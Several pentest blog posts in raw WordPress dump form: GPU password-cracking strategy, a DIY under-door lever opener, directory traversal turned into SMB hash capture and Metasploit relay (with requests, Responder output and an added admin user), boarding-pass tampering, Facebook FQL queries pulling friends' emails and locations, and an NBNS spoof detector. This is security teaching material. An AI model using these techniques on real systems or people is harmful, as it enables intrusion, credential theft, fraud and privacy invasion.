Using mask attacks allows us to match common password patterns. Based on the passwords that we've cracked in the past, we identified the fifty most common password patterns (that our clients use). Here's a handy perl script for identifying those patterns - http://pastebin.com/Sybzwf3K. Due to the excessive time that some of these masks take, we've trimmed our list down to forty-three masks. The masks are based on the types of characters being used for the password They follow the following format: ?u?l?l?l?l?d?d?d This is equivalent to (1 Uppercase Character) (4 Lowercase Characters) (3 Decimals). Or a more practical example would be "Netsp199" For more information on masking attacks with oclHashcat - http://hashcat.net/wiki/doku.php?id=mask_attack Our top forty-three masks take about fifteen minutes to run through and caught (29/326) 8% of the remaining uncracked hashes from this sample.

3. Go back to the dictionary, this time with more ammunition (10 minutes*) - Remaining Unique Hashes 297

After we've cracked some of the passwords, we will want to funnel those results back into our mangling attacks. It's not hard for us to guess "!123Acme123!" after we've already cracked "Acme123". Just use the cracked passwords as your dictionary and repeat your rule-based attacks. This is also a good point to combine rules. oclHashcat allows you to combine rule sets to do a multi-vector mangle on your dictionary words. I've had pretty good luck with combining the best64 and the d3ad0neV3 rules, but your mileage may vary. Using this technique, we were able to crack four of the remaining 297 (1.3%) uncracked hashes.

4. Double your dictionary, double your fun? (20-35 minutes)

At this point, we're hitting our limits and need to start getting creative. Along with our hefty primary dictionary, we have a number of shorter dictionaries that are small enough that we can combine them to catch repeaters (e.g. "P@ssword P@ssword"). The attack is pretty simple: a word from the first dictionary will be appended with a word from the second. This style of attack is known as the combinator attack and is run with the -a 1 mode of oclHashcat. Additional rules can be applied to each dictionary to catch some common word delineation patterns ("Super-Secret!"). The example here would append a dash to the first word and an exclamation mark to the second. To be honest, this did not work for this sample set. Normally, we catch a few with this and it can be really handy in some scenarios, but that was not the case here. At this point, we will (typically) be about an hour into our cracking process. From the uniqued sample set, we were able to crack 530 of the 828 hashes (64%) within one hour. From the complete set (including duplicates), we were able to crack 701 of the 1,000 total hashes (70.1%).

5. When all else fails, brute force

Take a look at the company password policy. Seven characters is the minimum? That will take us about forty minutes to go through. Eight characters? A little over two and a half days. What does that mean for our cracking? It means we can easily go after any remaining seven character passwords (where applicable). For those with eight character minimums (or higher), it doesn't hurt for us to run a brute-force overnight on the hashes. Anything we get out of the brute-force can always be pulled back in to the wordlist for the rule-based attacks. Given that a fair amount of our cracking happens during a well-defined project timeframe, we've found that it's best for us to limit the cracking efforts to about twenty-four hours. This prevents us from wasting too much time on a single hash and it frees up our cracking rig for our other projects. If we really need to crack a hash, we'll extend this time limit out, but a day is usually enough to catch most of the hashes we're trying to crack. With the overall efforts that we put in here (~24 hours), we ended up cracking 757 of the 1,000 hashes (75.7%). As luck would have it, I wrote up all of the stats for this blog and immediately proceeded to crack two new sets of NTLM hashes. One was close to 800 hashes (90% cracked) and another had over 5000 hashes (84% cracked). So your results will vary based on the hashes you're trying to crack. *All times are based on our current setup (Four 7950 cards running OclHashcat 1.01) One final item to note. This is not the definitive password cracking methodology. This will probably change for us in the next year, month, week… People are always changing up how they create passwords and that will continue to influence the way we attack their hashes. I'll try to remember to come back to this next year and update with any changes. Did we miss any key cracking strategies? Let me know in the comments. [post_title] => GPU Password Cracking – Building a Better Methodology [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-password-cracking-building-a-better-methodology [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:45 [post_modified_gmt] => 2021-04-13 00:05:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1124 [menu_order] => 358 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [37] => WP_Post Object ( [ID] => 1128 [post_author] => 10 [post_date] => 2014-02-19 07:00:07 [post_date_gmt] => 2014-02-19 07:00:07 [post_content] => NetSPI Senior Security Consultant Karl Fosaaen recently wrote a couple of guest blogs for the upcoming Secure360 2014 Conference blog, you can find them here: If you enjoy these, be sure to make it out to Secure360 this year as Karl will be presenting as well as co-instructing a full-day class on "An Introduction to Penetration Testing" along with NetSPI Principal Consultant Scott Sutherland. To learn more about Secure360, Karl's presentations, or information on how to sign up for the training please visit the pages below: [post_title] => Karl Fosaaen Guest Blogs for Secure360 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => karl-fosaaen-guest-blogs-for-secure360 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:48 [post_modified_gmt] => 2021-04-13 00:05:48 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1128 [menu_order] => 362 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [38] => WP_Post Object ( [ID] => 1131 [post_author] => 10 [post_date] => 2014-01-27 07:00:46 [post_date_gmt] => 2014-01-27 07:00:46 [post_content] =>

This is a bit of a departure from our technical blogs, but today we're going to show you how to build your own door opening tool out of hardware store materials. For those who are not familiar with a "lever opener tool", it's a tool used by locksmiths (and others) to open doors from the outside. They're long hooks with a string attached. When the hook and string are looped over a door handle (think the L-shaped bar handles), tension is applied to the string and the hook pushes the door handle down.

Here's a professional one made by Keedex Inc.

Doortool

It's my understanding that you have to be a locksmith or an officer of the law in order to purchase/own one of these (Also might depend on your state). But who knows, Amazon is selling them. So as with any of our "how to" blogs, be careful with what you're doing, as it may not be totally legal in your area. TOOOL is a great place to look at for local lock pick laws.

Here's a basic MS Paint diagram of how the tool works.

Untitled

Hook the handle with the top of the tool and pull on the string. This should push the door handle down and you should be able to apply pressure to open the door. These are really simple to operate and can be really handy for entering locked doors. There are a couple of catches though. This will (potentially) not work if the door has a deadbolt. There are doors (see hotel rooms) that typically have linked deadbolts that will unlock when the handle is opened, but not every door is like that.

How to Make Your Own

We started with a couple of requirements on our end for making this:

  • Parts have to be readily available for purchase
  • The tool has to be non-damaging to the door
  • Tool should cost less than $50
    • The current cost of a Keedex K-22 on Amazon

Here's the parts list of everything that we bought.

Part NamePrice
Zinc Threaded Rod ¼”6 Feet - $3.97
Vinyl Coated Steel Rope6 Feet – $1.86
Rod Coupling Nut (optional)3 pack – $1.24
Key Rings (optional)2 pack - $0.97
Heat Shrink Tubing ¼” (optional)8 Feet - $4.97
Pre-Tax Total$13.01

Assembly is pretty simple. If you do not use the heat shrink tubing, the threads may grip into your hands (and the door), so gloves are advised. On that note, it's best to use the tubing, as it will protect the door you are trying to enter from the threads on the rod.

Build Steps:

  1. If you're using the shrink tubing, slide the tubing over the threaded rod. The stuff we used was a pretty close fit, so we only heated up the two ends to seal it to our opener.
  2. Make your first bend about 4-5 inches from one of the ends. This bend should be an 85-90 degree angle, and will serve as the lever for pushing down the handle.
  3. Make your second bend at the base, opposite of your first bend. This will be a curved bend, versus a right angle. This will allow for easier rocking of the opener to bring the lever up to the handle.
  4. Add an additional bend to the base to act as a handle. This will give additional leverage over the opener. You may want to trim this part, you might not. It's up to you.
  5. Add the vinyl coated rope to the lever. This can be attached with electrical tape. We added the coupling nut at the connection point to make it easier to tape the rope down.

At this point, your opener should be ready to use. Make sure that there are no sharp or hard points on the opener, to help protect the door you're trying to open. We also added a handle from a foam sword we had laying around. That is also optional.

Here's the build process beautifully detailed in MS Paint.

Untitled

Here's our finished opener in action.

How to prevent the issue

Preventing this issue is not really a simple solution. However, one simple fix is to add draft guards to the bottom of the door to prevent the tool from being placed under the door. Additionally, handles should not be visible through glass doors. Being able to see the door handle makes it a lot easier to open. Door alarms and motion detectors should also be put in place to detect and alert on unauthorized entries.

[post_title] => Under the Door Tools – Opening Doors for Everyone [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => opening-doors-for-everyone [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:16 [post_modified_gmt] => 2021-06-08 21:51:16 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1131 [menu_order] => 365 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [39] => WP_Post Object ( [ID] => 1133 [post_author] => 10 [post_date] => 2014-01-13 07:00:41 [post_date_gmt] => 2014-01-13 07:00:41 [post_content] => For some reason I've recently run into a number of web applications that allow for either directory traversal or filename manipulation attacks. These issues are typically used to expose web server specific files and sensitive information files (web.config, salaryreport.pdf, etc.) and/or operating system files (SYSTEM, SAM, etc.) Here's what a typical vulnerable request looks like:
GET /Print/FileReader.aspx?Id=report1.pdf&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
Note the Id parameter in the URL. This is the vulnerable parameter that we will be attacking. We could easily change report1.pdf to any other file in the web directory (report2.pdf, web.config, etc.), but we can also turn our attack against the operating system. Here's an example request for the win.ini file from the web server:
GET /Print/FileReader.aspx?Id=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
This is a more traditional directory traversal attack. We're moving up several directories so that we can go back into the Windows directory. Directory traversal attacks have been around for a long time, so this may be a pretty familiar concept. Now that we have the basic concepts out of the way, let's see how we can leverage it against internally deployed web applications. Internally deployed web applications can allow for a much wider attack area (RDP, SMB, etc.) against the web server. This also makes directory traversal and file specification attacks more interesting. Instead of just accessing arbitrary files on the system, why don't we try and access other systems in the environment. In order to pivot this attack to other systems on the network, we will be utilizing UNC file paths to capture and/or relay SMB credentials. As a point of clarification, the following examples are against web servers that are running on Windows. Following our previous examples, we will be using a UNC path to our attacking host, instead of report1.pdf for the parameter. Here's an example request:
GET /Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
This will force the web server to look for test.pdf at 192.168.1.123. This will allow us to capture and crack the network hashes for the account running the web server service. Here's an example of how we would use Responder.py to do the SMB capture:
python Responder.py -i 192.168.1.123
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C
[+]NBT-NS & LLMNR responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface:eth0
Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
WPAD script loaded:function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:OFF
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF
Serving Executable via HTTP&WPAD is:OFF
Always Serving a Specific File via HTTP&WPAD is:OFF

[+]SMB-NTLMv2 hash captured from :  192.168.1.122
Domain is : EXAMPLE
User is : webserverservice
[+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 58D4DB26036DE56CB49237BFB9E418F8:01010000000000002A5FB1391FFCCE010F06DF8E6FE85EB20000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000
Share requested: \\192.168.1.123IPC$

[+]SMB-NTLMv2 hash captured from :  192.168.1.122
Domain is : EXAMPLE
User is : webserverservice
[+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 57A39519B09AA3F4B6EE7B385CFB624C:01010000000000001A98853A1FFCCE0166E7A590D6DF976B0000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000
Share requested: \\192.168.1.123test.pdf
Once we've captured the credentials, we can try to crack them with oclHashcat. If the server responds with LM hashes, you can use rainbow tables to speed things up. Once cracked, we can see where these credentials have access. Let's pretend that we are not able to crack the hash for the web server account. We can also try to relay these credentials to another host on the internal network (192.168.1.124) that the account may have access to. This can be done with the SMB Relay module within Metasploit and Responder recently added support for SMB relay. In the example below, we will use the Metasploit module to add a local user to the target server (192.168.1.124). The typical usage/payload for the module is to get a Meterpreter shell on the target system.
Module options (exploit/windows/smb/smb_relay):
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SHARE       ADMIN$           yes       The share to connect to
SMBHOST     192.168.1.124    no        The target SMB server
SRVHOST     192.168.1.123    yes       The local host to listen on.
SRVPORT     445              yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLCert                      no        Path to a custom SSL certificate
SSLVersion  SSL3             no        Specify the version of SSL that should be used 

Payload options (windows/adduser):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
CUSTOM                     no        Custom group name to be used instead of default
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
PASS      Password123!     yes       The password for this user
USER      netspi           yes       The username to create
WMIC      false            yes       Use WMIC on the target to resolve administrators group

Exploit running as background job.

Server started.
<------------Truncated------------>
Received 192.168.1.122:21251 EXAMPLEwebserverservice
LMHASH:b2--Truncated--03 NTHASH:46-- Truncated --00 OS: LM:
Authenticating to 192.168.1.124 as EXAMPLEwebserverservice...
AUTHENTICATED as EXAMPLEwebserverservice...
Connecting to the defined share...
Regenerating the payload...
Uploading payload...
Created OemWSPRa.exe...
Connecting to the Service Control Manager...
Obtaining a service manager handle...
Creating a new service...
Closing service handle...
Opening service...
Starting the service...
Removing the service...
Closing service handle...
Deleting OemWSPRa.exe...
Sending Access Denied to 192.168.1.122:21251 EXAMPLEwebserverservice
This may not be mind-blowing new information, but hopefully this gives you some good ideas on other ways to utilize directory traversal vulnerabilities. [post_title] => SMB Attacks Through Directory Traversal [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => smb-attacks-through-directory-traversal [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:54 [post_modified_gmt] => 2021-04-13 00:05:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1133 [menu_order] => 366 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [40] => WP_Post Object ( [ID] => 1138 [post_author] => 10 [post_date] => 2013-11-15 07:00:34 [post_date_gmt] => 2013-11-15 07:00:34 [post_content] => I've covered hacking Passbook files in the past, but I've decided that it's now a good time to cover modifying boarding passes. To start things off, you should not replicate what I'm showing in this blog. Modifying your boarding passes could easily get you in trouble with the TSA, and no one has time for that. iOS 7 has made it a lot easier to export Passbook files, so I think it's time to point out some issues surrounding boarding passes in Passbook. First off, let's send ourselves a copy of a boarding pass. It's as simple as opening Passbook, opening the pass, and hitting the square in the bottom left corner of the pass. Boarding Once you've emailed the .pkpass file to yourself, right click on the file and extract (or unzip) the files. The .pkpass file is just a zip file with a different name. Bp This will result in the following files in the directory. Bp There will be two more files in there if you have Sky Priority. If you don't already have Sky Priority, the image files can be found here. These footer images are also used for the TSA Pre Check boarding passes. They just have the Pre Check logo appended to the right of the Sky Priority logo. So we have the boarding pass file. That's cool. What can we do with it? Well, if you have an Apple Developer's account ($99 - more info here), you can modify the boarding pass and email it back to yourself. There is a signature file required by iOS to trust the Passbook pass, that can only be generated with a proper Apple Developer's certificate, but that's something you get as an Apple developer. I have heard that this signature file is not required for loading Passbook files into the "Passbook for Android" application, but I have not seen it in practice. So if you're using the passes from an Android phone, there's a chance that you won't have to re-sign the pass. For this demonstration, we'll show how you can give yourself Sky Priority on a flight. All that you need to do is add the two Sky Priority images (linked above) to your directory and modify the pass.json file to say that you are in the SKY boarding zone. This can easily be done with a text editor. Here's what my pass.json file looks like after changing the boarding zone. Bp Note that I changed the "zone" parameter. If you felt so inclined, you could change your seat number. If you wanted to social engineer your way into first class, this would be a good way to start. Again, I don't recommend doing any of this. This would not change your boarding pass barcode (also modifiable in pass.json), which is "tamper evident" and is supposed to be signed by a Delta private key. I have not tested this, but if the airport barcode scanners are not checking the signature, you would be able to modify the barcode as well. Again, I have not tested this or seen it in practice, but I have seen documentation that states the security data (signature) is optional. There's more info on the barcode standard here. If you are going to re-sign the pass, you will also need to modify the passTypeIdentifier and teamIdentifier fields (in the pass.json) to match your Apple Developer's account. If these do not match your Apple info, the pass will not validate when you go to sign and/or use it. There's some more info on signing your first pass here. You'll also want to delete your manifest.json and signature files, as those were generated by the original pass signer. Your final directory will look like this: Bp At this point you will want to run the SignPass utility on the directory. Your output will look like this. Bp And you will end up with a .pkpass file that you can email to your iOS device. Boarding Now, let's say you wanted to make it easier to upgrade your priority for all of your flights. It would not be hard to make a script to listen on an email inbox for a .pkpass file, unzip it, modify it, re-sign it, and email the pass back to the sender. On that note, don't send me your boarding passes. I don't have this script set up and I don't want your boarding passes. This issue is not limited to Delta. Any app that uses Passbook, is vulnerable to pass tampering attacks. This has been a problem for a while. Now that Passbook allows easy exports of .pkpass files, messing with the files is a lot easier. [post_title] => Sky Prioritize Yourself [post_excerpt] => I've covered hacking Passbook files in the past, but I've decided that it's now a good time to cover modifying boarding passes. To start things... [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => sky-prioritize-yourself [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:36 [post_modified_gmt] => 2021-06-08 21:51:36 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1138 [menu_order] => 370 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [41] => WP_Post Object ( [ID] => 1142 [post_author] => 10 [post_date] => 2013-10-21 07:00:39 [post_date_gmt] => 2013-10-21 07:00:39 [post_content] =>

A Primer on Facebook Email Privacy

Facebook has a long and storied history of having confusing security and privacy settings. As of lately, there are three different settings (that I can find) that you can configure to control access to your email address(es). Each of these settings control specific facets of your email address privacy, but in this post we will focus on the third setting in the screen shot below. These settings are responsible for your email privacy, both on your profile and for your friends being able to see your email. This setting can be found by going to your “About” section of your profile and editing your contact information. Fql The locks are the configuration settings for your emails being accessible (by friends or publicly) and the circles are the configuration settings for for your email showing up in your timeline. The default setting (that I’ve seen) for your email privacy on Facebook is set to “Friends”. Fql But this is kind of an odd setting to have, as you can’t access or look up a friends email through the web interface of Facebook (assuming it is hidden from the timeline/profile). From what I can tell, this setting is primarily available for importing your Facebook contacts to other services (Gmail, Yahoo, etc.). I find this interesting as most people assume that they have successfully hidden their email adress on Facebook when they choose to not display it on their profile. Most of my friends are currently hiding both email addresses (private and facebook.com addresses) or they are just showing their @facebook.com email address in their profile. However, very few of my friends have their private email address set as available to “Only Me.” The following walkthrough will go over how to enumerate your available Facebook friends’ email addresses by manipulating traffic from the iOS Facebook application.

The Attack

We’ve previously covered a few different attacks on the NetSPI blog regarding proxies and iOS apps. This will be yet another example of abusing permissions given to a mobile app to get access to data. The setup for this attack is pretty simple. We will be using the Burp proxy from Portswigger to intercept the iOS traffic. First, install the Portswigger CA on your iOS device. This is needed to intercept the SSL traffic. Next, proxy your iOS traffic through Burp, and start looking at and modifying/replaying application traffic. I won’t get into the full details here, but the official instructions for setting up the Burp Proxy are here - http://portswigger.net/burp/help/proxy_options_installingCAcert.html#iphone After opening up the Facebook application, we see the following request in the traffic when we go to look at our messages. Fql
GET /method/fql.multiquery?sdk=ios&queries=%7B%22group_conversations%22%3A%22SELECT%20thread_id%2C%20name%2C%20title%2C%20is_group_conversation%2C%20pic_hash%2C%20participants%2C%20%20thread_fbid%2C%20timestamp%20FROM%20unified_thread%20%20WHERE%20timestamp%20%3E%201378149789000%20and%20folder%3D%27inbox%27%20and%20is_group_conversation%3D1%20%20and%20not%20archived%20order%20by%20timestamp%20desc%20limit%203%20offset%200%22%2C%22group_conversation_participants_profile_pic_urls%22%3A%22SELECT%20id%2C%20size%2C%20url%20FROM%20square_profile_pic%20WHERE%20size%20IN%20%2888%2C%20148%29%20AND%20id%20IN%20%28SELECT%20participants.user_id%20FROM%20%23group_conversations%29%22%2C%22favoriteRanking-Groups%22%3A%22SELECT%20favorite_id%2C%20ordering%2C%20is_group%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%20and%20is_group%22%2C%22favorites%22%3A%22SELECT%20uid%2C%20is_pushable%2C%20has_messenger%2C%20last_active%20FROM%20user%20WHERE%20uid%20in%20%28SELECT%20favorite_id%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%29%22%2C%22favoriteRanking%22%3A%22SELECT%20favorite_id%2C%20ordering%2C%20is_group%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%22%2C%22group_conversations_favorites%22%3A%22SELECT%20thread_id%2C%20name%2C%20title%2C%20is_group_conversation%2C%20%20pic_hash%2C%20participants%2C%20thread_fbid%2C%20timestamp%20FROM%20unified_thread%20WHERE%20thread_fbid%20IN%20%28select%20favorite_id%20from%20%23favoriteRankingGroups%29%22%2C%22group_conversation_participants%22%3A%22SELECT%20id%2C%20name%20FROM%20profile%20WHERE%20id%20IN%20%28SELECT%20participants.user_id%20FROM%20%23group_conversations%29%22%2C%22top_friends%22%3A%22SELECT%20uid%2C%20is_pushable%2C%20has_messenger%2C%20last_active%20FROM%20user%20WHERE%20uid%20in%20%28SELECT%20uid2%20FROM%20friend%20WHERE%20uid1%3Dme%28%29%20order%20by%20communication_rank%20desc%20LIMIT%2015%29%22%7D&sdk_version=2&access_token=REDACTED&format=json&locale=en_US HTTP/1.1 Host: api.facebook.com Proxy-Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* Cookie: REDACTED Connection: keep-alive Accept-Language: en-us User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B329 [FBAN/FBIOS;FBAV/6.4;FBBV/290891;FBDV/iPhone4,1;FBMD/iPhone;FBSN/iPhone OS;FBSV/6.1.3;FBSS/2; FBCR/AT&T;FBID/phone;FBLC/en_US;FBOP/1]
This request selects your conversations along with the information about the people involved in the conversations. It’s a pretty complicated query, but we won’t care about that in a minute. If you want to use this as a tutorial, this is the request that you will want to right-click on and “send to repeater” in Burp. Here’s the unencoded query:
{"group_conversations":"SELECT thread_id, name, title, is_group_conversation, pic_hash, participants,  thread_fbid, timestamp FROM unified_thread  WHERE timestamp > 1378149789000 and folder='inbox' and is_group_conversation=1  and not archived order by timestamp desc limit 3 offset 0","group_conversation_participants_profile_pic_urls":"SELECT id, size, url FROM square_profile_pic WHERE size IN (88, 148) AND id IN (SELECT participants.user_id FROM #group_conversations)","favoriteRankingGroups":"SELECT favorite_id, ordering, is_group FROM messaging_favorite WHERE uid=me() and is_group","favorites":"SELECT uid, is_pushable, has_messenger, last_active FROM user WHERE uid in (SELECT favorite_id FROM messaging_favorite WHERE uid=me())","favoriteRanking":"SELECT favorite_id, ordering, is_group FROM messaging_favorite WHERE uid=me()","group_conversations_favorites":"SELECT thread_id, name, title, is_group_conversation,  pic_hash, participants, thread_fbid, timestamp FROM unified_thread WHERE thread_fbid IN (select favorite_id from #favoriteRankingGroups)","group_conversation_participants":"SELECT id, name FROM profile WHERE id IN (SELECT participants.user_id FROM #group_conversations)","top_friends":"SELECT uid, is_pushable, has_messenger, last_active FROM user WHERE uid in (SELECT uid2 FROM friend WHERE uid1=me() order by communication_rank desc LIMIT 15)"}
What we’re going to do is make our own query to get more information about our friends. Returned in a nice easy to parse format. Here’s the query that we’re going to use to select our Friends’ email addresses: {" friends_email":"SELECT uid, email, contact_email FROM user WHERE uid in (SELECT uid2 FROM friend WHERE uid1=me())"} You will have to URL encode the spaces in the query, but you can just paste this over the previous query that we intercepted earlier (and passed to repeater) and URL encode it in Burp. This will select the Facebook User ID, and any email or contact email addresses associated with the account. The UID can also be handy for quickly pulling up someone’s account. i.e. https://www.facebook.com/4 Here’s a sample of what we get back from the query: [{"name":"friends_email","fql_result_set":[{"uid":13931306,"email":"karlu0040example.com","contact_email":"karlu0040example.com"}]}] So we can access our friends’ email addresses, this may not seem like a big deal for some people, but if you have friends like mine, then your friends may not want their real email address publically available through Facebook. If you can’t tell by the screen shot above, my friends appreciate their privacy. While we’re requesting stuff that your friends may not want you to have access to, let’s look at some other interesting info that you can access. Some of my personal favorites:
  • Location Data for check-ins:
    • {" friends_locations":"SELECT coords, message, timestamp FROM location_post WHERE author_uid in (SELECT uid2 FROM friend WHERE uid1=me())"}
  • Publicly liked pages:
    • {" URLs_liked":"SELECT url FROM url_like WHERE user_id =4"}
  • Events information:
    • {"z_events":"SELECT description, host FROM event WHERE creator=4"}
  • Friends of a friend:
    • {"friends_of":"SELECT+uid2+FROM+friend+WHERE+uid1=4"}
From the Facebook Developers page, here’s the schema that you can use to query FQL - https://developers.facebook.com/docs/reference/fql

Conclusion

I did reach out to Facebook about this issue, but since this is “intended” functionality, they were not very interested in hearing about this. The functionality of the email privacy setting doesn’t make a whole lot of sense, but I will be setting my email address to private for all of my accounts. [post_title] => Facebook Friends, Your Email Address Isn’t that Private [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => facebook-friends-your-email-address-isnt-that-private [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:34 [post_modified_gmt] => 2021-06-08 21:51:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1142 [menu_order] => 373 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [42] => WP_Post Object ( [ID] => 1148 [post_author] => 10 [post_date] => 2013-09-05 07:00:50 [post_date_gmt] => 2013-09-05 07:00:50 [post_content] =>

One of the easiest ways for us to capture and/or relay hashes on the network is through NBNS spoofing. We will primarily use Responder.py or the Metasploit nbns spoofing module . Both of these tools can be great for attackers to use during a pen test, but remediation options for fixing the underlying issues are limited. In response to a lack of available mitigation options, I’ve written a script to help identify NBNS spoofers on the network.

This script makes frequent NBNS requests for a non-existent host name (the default is NETSPITEST) and it then listens for NBNS responses. Since there shouldn’t be any responses for this host name, the listener will sit idle until a response is received. If a response is received, we will know that there’s a spoofer on the network. Once a spoofer is identified, email alerting and syslogging options are available to alert network administrators of the issue.

Example Usage:

sudo python spoofspotter.py -i 192.168.1.161 -b 192.168.1.255 -n NBNSHOSTQUERY -s 192.168.1.2 -e karl.fosaaen@example.com -f test.log

This example command will make custom queries for NBNSHOSTQUERY for the responder to respond to. It will send an email alert to karl.fosaaen@example.com when an attack is identified and responses will also be logged to test.log

Required arguments:

-i 192.168.1.110The IP of this host
-b 192.168.1.255The Broadcast IP of this host

Optional arguments:

-h, --help Show this help message and exit
-f /home/nbns.log,
-F /home/nbns.log
File name to save a log file
-S trueLog to local Syslog - this is pretty beta
-e you@example.comThe email to receive alerts at
-s 192.168.1.109Email Server to Send Emails to
-n EXAMPLEDOMAINThe string to query with NBNS, this should be unique
-R trueThe option to send Garbage SMB Auth requests to the attacker (not implemented yet)
-c trueContinue Emailing After a Detection, could lead to spam

Example Script Output:

$ sudo python spoofspotter.py -i 192.168.1.161 -b 192.168.1.255 -n testfakehostname -s 192.168.1.2 -e karl.fosaaen@netspi.com -f test.log
Starting NBNS Request Thread...
Starting UDP Response Server...
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:47.497274 from host 192.168.1.162
Email Sent
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:49.549245 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:51.600981 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:53.657044 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:55.721037 from host 192.168.1.162
^C
Stopping Server and Exiting...

The script is available out on NetSPI’s github page: https://github.com/NetSPI/SpoofSpotter

